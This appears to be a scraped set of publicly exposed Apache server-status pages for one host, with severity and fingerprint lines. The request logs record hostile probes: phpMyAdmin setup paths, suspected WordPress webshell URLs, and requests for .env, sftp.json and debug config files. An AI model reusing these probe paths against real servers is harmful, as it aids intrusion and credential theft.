5.301015081520.00.2375.96 64.227.126.135h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-3815071140/48/4042_ 5.67702020691960.00.4287.41 162.158.82.130h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-3815071140/47/4146_ 5.970012418830.00.4479.59 64.227.126.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-3815071140/49/4123_ 5.62702019979310.01.2165.06 172.68.134.86h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3815071120/49/3458_ 6.18300021810390.00.9764.63 162.158.82.139h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3815071120/43/3387_ 6.340015173040.00.3048.33 64.227.126.135http/1.1 3-3815071120/38/3517_ 6.340017482010.00.5962.23 64.227.126.135h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-3815071120/44/3698_ 5.97295029263030.00.4258.05 39.108.98.55http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET http://103.23.61.80:80/phpMyAdmin-2.11.0/scripts/setup.php 3-3815071120/50/3703_ 5.97295018281970.01.1863.97 39.108.98.55http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3815071120/42/3427_ 6.011010863850.00.7348.31 64.227.126.135h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-3815071120/37/3692_ 5.980018290730.00.3681.16 64.227.126.135h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-3815071120/45/3695_ 5.82295011681080.00.5675.88 172.71.214.217h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3815071120/40/3583_ 5.97300026143820.00.2450.96 39.108.98.55http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET http://103.23.61.80:80/phpMyAdmin-2.11.3/scripts/setup.php 3-3815071120/47/3518_ 5.500012811280.00.2846.42 64.227.126.135h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-3815071130/68/4417_ 7.8202621394410.01.6688.88 64.227.126.135http/1.1 4-3815071130/59/4130_ 7.7886011308060.01.2878.79 172.64.236.44h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3815071130/60/4407_ 7.9391131211711830.01.2386.38 172.69.64.153h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3815071130/59/3956_ 7.960030139970.01.31133.97 64.227.126.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 4-3815071130/76/4161W 7.920022462090.02.1868.26 64.227.126.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 4-3815071130/60/3801_ 7.6186258815590.01.39103.64 188.114.102.235h2tandemsl.com:443done, str
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e379da1e85
Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Sunday, 24-Dec-2023 01:38:41 CET Restart Time: Wednesday, 06-Dec-2023 07:41:32 CET Parent Server Config. Generation: 95 Parent Server MPM Generation: 94 Server uptime: 17 days 17 hours 57 minutes 8 seconds Server load: 0.53 0.20 0.07 Total accesses: 386639 - Total Traffic: 10.3 GB - Total Duration: 205483260 CPU Usage: u52.1 s67.89 cu2114.4 cs1624.78 - .252% CPU load .252 requests/sec - 7.0 kB/second - 27.9 kB/request - 531.46 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0912544no0yes010000 1912591no0yes010000 2912592no2yes010001 3912593no0yes010000 4912678no1yes19000 Sum503 149001 _____________________________________________W____ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-949125440/16/6732_ 4.09497038545060.00.25172.71 80.85.87.117http/1.1barrerasdecontencion.com:80GET /wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm9 0-949125440/16/7305_ 4.1049414250635170.00.87202.43 80.85.87.117http/1.1barrerasdecontencion.com:443GET /simple.php HTTP/1.1 0-949125440/14/7350_ 4.1049011727656970.00.10216.77 80.85.87.117http/1.1barrerasdecontencion.com:443GET /wp-content/plugins/yyobang/mar.php HTTP/1.1 0-949125440/12/6706_ 3.13484033770330.00.06210.79 162.158.119.12h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-949125440/16/6937_ 3.13485037543950.00.11173.05 162.158.119.235h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-949125440/10/7232_ 3.12494031869780.00.81229.94 80.85.87.117http/1.1 0-949125440/13/6990_ 3.12495023220760.00.25207.60 80.85.87.117http/1.1 0-949125440/8/7334_ 3.133070042125910.00.26162.76 162.158.118.128h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-949125440/8/6576_ 2.073326033421380.00.10236.85 188.114.111.173h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-949125440/15/7102_ 3.2130705949337420.00.11253.97 198.38.83.104http/1.1barrerasdecontencion.com:443POST /xmlrpc.php HTTP/1.1 1-949125910/16/6605_ 3.1830395518594520.00.08221.24 91.134.248.249http/1.1barrerasdecontencion.com:443POST /xmlrpc.php HTTP/1.1 1-949125910/18/6350_ 2.16474529825080.00.15146.31 80.85.87.117http/1.1 1-949125910/14/6084_ 2.72466036518040.00.01156.10 80.85.87.117http/1.1 1-949125910/18/6463_ 3.082166043192250.00.04231.69 162.158.119.102h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-949125910/17/5903_ 2.782354029703220.01.08231.67 152.32.238.104http/1.17f7ffb32-1f6e-4d16-bdaa-07377bc\x16\x03\x01 1-949125910/17/6682_ 3.37235452133921630.00.96226.46 97.74.211.129http/1.1barrerasdecontencion.com:443POST /xmlrpc.php HTTP/1.1 1-949125910/16/6421_ 3.093039135733800.00.20126.86 162.158.118.209h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-949125910/15/6167_ 4.0047812132426600.00.91200.26 80.85.87.117http/1.1barrerasdecontencion.com:443GET /wp-content/themes/finley/min.php HTTP/1.1 1-949125910/14/6242_ 3.4421676387543890.00.46130.90 81.93.145.32http/1.1barrerasdecontencion.com:443POST /xmlrpc.php HTTP/1.1 1-949125910/19/6025_ 4.0246612423268180.00.20128.80 80.85.87.117http/1.1barrerasdecontencion.com:443GET /class.api.php HTTP/1.1 2-949125920/87/7722_ 7.690027394720.00.65146.90 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-949125920/83/7687_ 7.690051611490.00.55219.05 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-949125920/88/7452_ 7.23023842338130.01.22222.29 172.70.188.75h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-949125920/87/7802_ 7.690026439120.01.23213.31 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 2-949125920/83/7873_ 7.633128028180.00.77253.50 161.35.27.144h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-949125920/70/8014_ 7.662120649710.00.99175.98 161.35.27.144h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-949125920/86/7273_ 7.691028002740.01.39195.35 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 2-949125920/97/7438_ 7.45296630359050.01.48206.49 161.35.27.144h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-949125920/103/7763_ 7.663033208820.01.16226.85 161.35.27.144http/1.1 2-949125920/102/7120_ 7.4436339274160.00.82209.91 161.35.27.144h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-949125930/24/7672_ 3.442644026042370.00.21275.06 23.82.40.223http/1.1 3-949125930/29/8040_ 3.652645125237390.00.14189.35 23.82.40.223http/1.1barrerasdecontencion.com:443GET /wp-content/plugins/contact-form-7/includes/js/index.js?ver 3-949125930/19/8118_ 3.53158055020150.00.92171.46 172.69.194.123h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-949125930/28/7997_ 4.42481046700120.00.44143.60 80.85.87.117http/1.1barrerasdecontencion.com:80GET /fm1.php HTTP/1.1 3-949125930/30/7660_ 4.570033107870.00.30207.00 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-949125930/24/8077_ 4.571135021810.00.17152.28 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-949125930/22/8105_ 3.5225625665110.00.98180.59 161.35.27.144http/1.1 3-949125930/18/8172_ 3.450132474330.01.88194.89 162.158.118.144h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-949125930/20/7693_ 3.453025047636580.00.10213.97 162.158.118.214h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-949125930/22/7880_ 3.44477038005510.00.15172.42 80.85.87.117http/1.1 4-949126780/110/9720_ 8.29016359526070.01.53270.67 172.70.110.143h2lcftech.es:443idle, streams: 0/163/163/0/0 (open/recv/resp/push/rst) 4-949126780/109/9777_ 8.29116275260390.01.44335.55 172.70.110.143h2lcftech.es:443idle, streams: 0/166/166/0/0 (open/recv/resp/push/rst) 4-949126780/109/9736_ 8.28217632970560.04.38218.94 161.35.27.144http/1.1 4-949126780/104/9898_ 8.27220039543280.02.24269.35 161.35.27.144http/1.1 4-949126780/111/10171_ 8.28024858731600.02.37259.18 172.70.110.143h2lcftech.es:443idle, streams: 0/169/169/0/0 (open/recv/resp/push/rst) 4-949126780/110/9597W 8.260060237380.02.01284.68 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 4-949126780/104/10059_ 8.29120042386540.01.18285.96 172.70.110.143h2lcftech.es:443idle, streams: 0/167/167/0/0 (open/recv/resp/push/rst) 4-949126780/108/9407_ 8.29114262858
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e35760b093
Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Monday, 11-Dec-2023 15:58:54 CET Restart Time: Wednesday, 06-Dec-2023 07:41:32 CET Parent Server Config. Generation: 30 Parent Server MPM Generation: 29 Server uptime: 5 days 8 hours 17 minutes 22 seconds Server load: 0.20 0.11 0.09 Total accesses: 75068 - Total Traffic: 2.5 GB - Total Duration: 63881419 CPU Usage: u21.02 s21.92 cu546.04 cs464.86 - .228% CPU load .163 requests/sec - 5.6 kB/second - 34.2 kB/request - 850.981 ms/request 2 requests currently being processed, 48 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0294001no1yes19000 1293869no1yes010000 2293871no0yes010000 3293870no1yes19000 4293872no0yes010000 Sum503 248000 _________K____________________W___________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-292940010/68/1542_ 4.55005983020.00.6541.16 143.110.218.229http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-292940010/144/1612_ 4.4122718391310.01.3346.92 143.110.218.229h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-292940010/116/1600_ 4.424011498240.00.5653.26 172.64.236.85h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-292940010/66/1454_ 4.204227951530.01.3736.63 143.110.218.229h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-292940010/148/1678_ 4.403699803580.02.0539.83 2.136.78.3h2relehse.com:443done, streams: 0/83/83/0/0 (open/recv/resp/push/rst) 0-292940010/96/1607_ 4.182358764050.01.7979.10 143.110.218.229http/1.1 0-292940010/137/1644_ 4.55104466490.01.1066.86 143.110.218.229http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-292940010/48/1644_ 4.550436367860.00.3243.38 2.136.78.3h2relehse.com:443idle, streams: 0/83/83/0/0 (open/recv/resp/push/rst) 0-292940010/61/1529_ 4.403299943510.00.7360.37 2.136.78.3h2relehse.com:443idle, streams: 0/9/9/0/0 (open/recv/resp/push/rst) 0-292940011/81/1577K 4.5604728086563.20.5069.97 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-292938690/12/1192_ 1.67502883300.00.1255.48 172.68.134.53h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-292938690/25/1070_ 1.84102580150.00.1542.84 143.110.218.229http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 1-292938690/44/1023_ 1.812222749460.00.2648.80 143.110.218.229h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-292938690/20/1021_ 1.841024024790.00.1445.73 143.110.218.229http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-292938690/12/1041_ 1.3911102483140.00.0632.95 172.71.186.109h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-292938690/56/1270_ 1.81323108253940.00.4053.39 143.110.218.229http/1.1 1-292938690/15/1001_ 1.8210222195590.00.0621.92 194.224.76.162h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-292938690/13/1035_ 1.81202102140.00.6228.74 143.110.218.229http/1.1 1-292938690/11/1060_ 1.805212470650.00.0319.92 2.136.78.3h2relehse.com:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 1-292938690/13/1025_ 1.671102380780.00.6123.21 172.68.134.58h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-292938710/6/1307_ 1.4824506146180.00.1430.80 172.68.134.55h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-292938710/9/1282_ 1.694424987940.00.0823.13 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-292938710/4/1302_ 1.30245022220180.00.0327.82 172.64.236.130h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-292938710/5/1264_ 1.2739027262920.00.0436.17 162.158.166.82h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-292938710/4/1323_ 1.5339103185210.00.1044.73 172.68.134.120h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-292938710/2/1216_ 0.85391755826040.00.0140.77 52.230.152.130http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-292938710/7/1286_ 1.49389237321050.00.1238.99 194.224.76.162h2relehse.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-292938710/5/1264_ 1.5439007049690.00.0670.76 172.68.134.31h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-292938710/7/1200_ 1.612502413360560.01.2566.95 194.224.76.162h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-292938710/7/1176_ 1.54389020347770.00.1038.56 172.68.134.119h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-292938700/215/1275W 5.780011259880.04.1666.58 143.110.218.229http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-292938700/171/1383_ 5.741010629520.01.1448.46 2.136.78.3h2relehse.com:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 3-292938700/151/1306_ 5.800010099830.01.6249.40 172.70.57.182h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-292938700/322/1500_ 5.74109192590.02.0828.58 2.136.78.3h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-292938700/129/1355_ 5.79176515211960.01.7029.00 188.114.111.170h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-292938700/152/1288_ 5.810018774690.01.0423.87 143.110.218.229http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-292938700/186/1443_ 5.80120510856070.01.4250.21 188.114.111.170h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-292938700/73/1198_ 5.622409671160.01.5225.16 2.136.78.3h2relehse.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-292938700/75/1153_ 5.810019777770.00.8338.36 143.110.218.229http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-292938700/185/1340_ 5.76208526400.01.2130.16 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-292938720/10/2192_ 1.741352012701690.00.0965.15 195.235.210.15h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-292938720/9/2224_ 1.643037064570.00.4682.62 143.110.218.229http/1.1 4-292938720/13/2469_ 1.634909901430.00.5156.79 172.68.134.17h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-292938720/15/2201_ 1.7449408291860.00.2356.55 2.136.78.3h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-292938720/9/2409_ 1.812119972260.00.2998.14 143.110.218.229http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 4-292938720/7/2201_ 1.68492113132410.00.0454.05 195.235.210.15h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-292938720/8/2161_ 1.4731879264860.00.0578.06 143.110.218.229
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e33fe80f1e
Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Thursday, 16-Nov-2023 21:03:29 CET Restart Time: Saturday, 04-Nov-2023 04:38:38 CET Parent Server Config. Generation: 89 Parent Server MPM Generation: 88 Server uptime: 12 days 16 hours 24 minutes 50 seconds Server load: 0.11 0.10 0.09 Total accesses: 320315 - Total Traffic: 7.0 GB - Total Duration: 192120869 CPU Usage: u31.56 s45.51 cu1873.42 cs1382.21 - .304% CPU load .292 requests/sec - 6.7 kB/second - 23.0 kB/request - 599.787 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0613358no1yes19000 1613226no0yes010000 2613228no0yes010000 3613227no0yes010000 4613229no1yes010000 Sum502 149000 _____W____________________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-886133580/15/6402_ 0.951024021930.00.10153.30 213.207.247.79http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-886133580/11/5644_ 0.9124825318150.00.17133.03 167.99.184.41http/1.1 0-886133580/8/6066_ 0.921118931658460.00.16148.87 162.158.239.29h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-886133580/7/5920_ 1.000034012220.00.10159.97 167.99.184.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-886133580/7/6121_ 0.86269624621360.00.24131.71 167.99.184.41h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-886133580/11/5870W 0.990036367310.00.31146.29 167.99.184.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-886133580/5/6072_ 0.503084764210.00.08130.90 167.99.184.41h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-886133580/9/5838_ 0.81431425902780.00.17155.08 167.99.184.41h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-886133580/8/5785_ 0.794102332544540.00.08140.16 167.99.184.41h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-886133580/9/5397_ 0.883025071340.00.07136.33 167.99.184.41http/1.1 1-886132260/1/5935_ 0.35560414562320.00.02125.46 172.71.102.218h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-886132260/1/5852_ 0.37565118690660.00.01113.11 172.71.246.67h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-886132260/2/6327_ 0.35587129004360.00.01132.65 162.158.87.192h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-886132260/0/6169_ 0.0058733549595480.00.00131.40 172.70.214.167h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-886132260/1/5849_ 0.581014440900.00.00119.83 167.99.184.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 1-886132260/2/6124_ 0.581058209350.00.15131.08 167.99.184.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-886132260/0/6216_ 0.002023813910.00.00135.16 167.99.184.41http/1.1 1-886132260/1/6268_ 0.31560019582630.00.26112.63 172.71.130.78h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-886132260/1/6127_ 0.303020882390.00.00143.96 167.99.184.41http/1.1 1-886132260/1/6021_ 0.36565019432720.00.00119.35 172.71.103.8h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-886132280/1/7736_ 0.30547063864770.00.00128.56 172.71.131.90h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-886132280/2/7518_ 0.372137486980.00.01168.80 167.99.184.41h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-886132280/1/7330_ 0.34147038711420.00.00179.09 134.0.10.229http/1.1 2-886132280/3/7458_ 0.39553076672790.00.02158.44 172.70.210.173h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-886132280/1/7239_ 0.355551157156360.00.01163.03 162.158.182.9h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-886132280/1/7445_ 0.35552071660110.00.00165.10 172.71.246.15h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-886132280/2/7205_ 0.621031596280.00.00130.74 167.99.184.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 2-886132280/1/7242_ 0.28547044676490.00.00146.19 172.71.167.103h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-886132280/1/7771_ 0.270040727310.00.00170.24 172.71.166.56h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-886132280/2/6974_ 0.551471244173040.00.01175.65 134.0.10.229http/1.1barrerasdecontencion.com:443GET /wp-cron.php HTTP/1.1 3-886132270/3/6239_ 0.548549940319630.00.06140.91 172.71.254.225h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-886132270/2/6564_ 0.138448039496120.00.02139.50 172.69.59.136h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-886132270/3/6103_ 0.692240337180.00.04147.11 167.99.184.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-886132270/2/6316_ 0.694127191940.00.01137.83 167.99.184.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-886132270/4/6330_ 0.5842631275260.00.09128.46 162.158.22.183h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-886132270/3/6473_ 0.649077843132390.00.03162.25 162.158.222.207h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-886132270/2/6326_ 0.40142141480240.00.03155.64 141.101.69.28h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-886132270/1/5978_ 0.34142039384670.00.00151.27 172.70.46.236h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-886132270/4/6083_ 0.601474243569060.00.00151.89 172.64.236.36h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-886132270/3/6757_ 0.401924719690.00.04182.95 172.70.46.113h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-886132290/8/6270_ 0.959180358255050.00.13180.63 162.158.238.48h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-886132290/6/6638_ 1.0072825429300.00.04127.90 172.71.186.109h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-886132290/8/6200_ 0.92249160256950.00.12133.91 172.64.238.104h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-886132290/9/6207_ 0.680022576030.00.82122.41 172.70.210.77h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 4-886132290/9/6388_ 0.79145220366110.00.45141.31 162.158.22.75h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-886132290/10/6186_ 1.000036929350.00.18134.81 167.99.184.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 4-886132290/9/5661_ 0.67287125837840.00.23123.63 172.70.210.137h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/res
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e3a9fdc231
Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Wednesday, 08-Nov-2023 05:07:32 CET Restart Time: Saturday, 04-Nov-2023 04:38:38 CET Parent Server Config. Generation: 24 Parent Server MPM Generation: 23 Server uptime: 4 days 28 minutes 53 seconds Server load: 0.05 0.09 0.09 Total accesses: 83272 - Total Traffic: 1.7 GB - Total Duration: 55084303 CPU Usage: u8.31 s12.75 cu490.47 cs380.16 - .257% CPU load .24 requests/sec - 5.3 kB/second - 22.0 kB/request - 661.499 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0213915no0yes19000 1214048no0yes010000 2213916no0yes010000 3213917no0yes010000 4213918no0yes010000 Sum500 149000 _W________________________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-232139150/2/1415_ 0.01002305330.00.0034.00 161.35.155.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.env HTTP/1.1 0-232139150/0/1195W 0.00002198910.00.0030.65 64.227.126.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-232139150/1/1464_ 0.01002432410.00.0040.64 161.35.155.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-232139150/0/1152_ 0.00012594800.00.0027.10 64.227.126.135http/1.1 0-232139150/1/1370_ 0.01002587190.00.0038.71 161.35.155.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /_all_dbs HTTP/1.1 0-232139150/0/1202_ 0.0002892359510.00.0041.87 162.158.166.189h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-232139150/1/1502_ 0.010064202630.00.0030.09 161.35.155.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.DS_Store HTTP/1.1 0-232139150/1/1267_ 0.01015921260.00.0124.29 